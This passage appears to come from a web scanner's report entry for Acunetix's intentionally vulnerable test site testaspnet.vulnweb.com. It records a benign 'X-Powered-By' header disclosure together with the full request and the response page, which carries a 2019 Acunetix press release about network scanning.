FjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPH